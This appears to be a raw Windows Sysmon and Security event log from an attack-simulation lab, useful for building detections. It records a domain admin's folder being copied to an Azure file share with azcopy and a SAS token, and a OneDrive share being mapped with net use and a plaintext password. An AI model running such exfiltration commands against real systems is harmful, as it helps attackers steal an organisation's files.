1 5 4 1 0 0x8000000000000000 11817 Microsoft-Windows-Sysmon/Operational DC01.snapattack.labs - 2024-11-19 18:22:43.176 A5CDDB11-D773-673C-0506-000000000900 4224 C:\Users\domainadmin\Downloads\azcopy.exe - - - - - azcopy.exe copy "C:\users\domainadmin\important" "https://rtaitstorage.file.core.windows.net/test/?sv=2022-11-02&ss=bfqt&srt=sco&sp=rwdlacupiytfx&se=2024-11-20T02:08:45Z&st=2024-11-19T18:08:45Z&spr=https&sig=%%2FdWxzmcOCKqnHvrscm%%2F3r1uD3PYxPzzunmL6jFgPN%%2FI%%3D" --recursive C:\Users\domainadmin\Downloads\ snapattack\domainadmin A5CDDB11-CF26-673C-ADA5-070000000000 0x7a5ad 1 High MD5=6211C80B0227EE939306D66B5C118531,SHA256=7A00078830E4ED87048240982EE6CE8C213CC542F7F829EEC9273064695CCEB1,IMPHASH=B196866F0BF37F1F128FA153413B744F 00000000-0000-0000-0000-000000000000 6868 - - -
4688 2 0 13312 0 0x8020000000000000 501669 Security MSEDGEWIN10.snapattack.labs S-1-5-21-421648065-3458498710-3574272164-1103 snapattack SNAPATTACK 0x807ad 0x1288 C:\Windows\System32\net.exe %%1937 0x2370 "C:\Windows\system32\net.exe" use y: https://d.docs.live.net/e2cc75927a725030 /user:snap.throwaway@outlook.com Throwitaway1! S-1-0-0 - - 0x0 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe S-1-16-12288
4688 2 0 13312 0 0x8020000000000000 501669 Security MSEDGEWIN10.snapattack.labs S-1-5-21-421648065-3458498710-3574272164-1103 snapattack SNAPATTACK 0x807ad 0x1288 C:\Windows\System32\net1.exe %%1937 0x2370 "C:\Windows\system32\net1.exe" use y: https://d.docs.live.net/e2cc75927a725030 /user:snap.throwaway@outlook.com Throwitaway1! S-1-0-0 - - 0x0 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe S-1-16-12288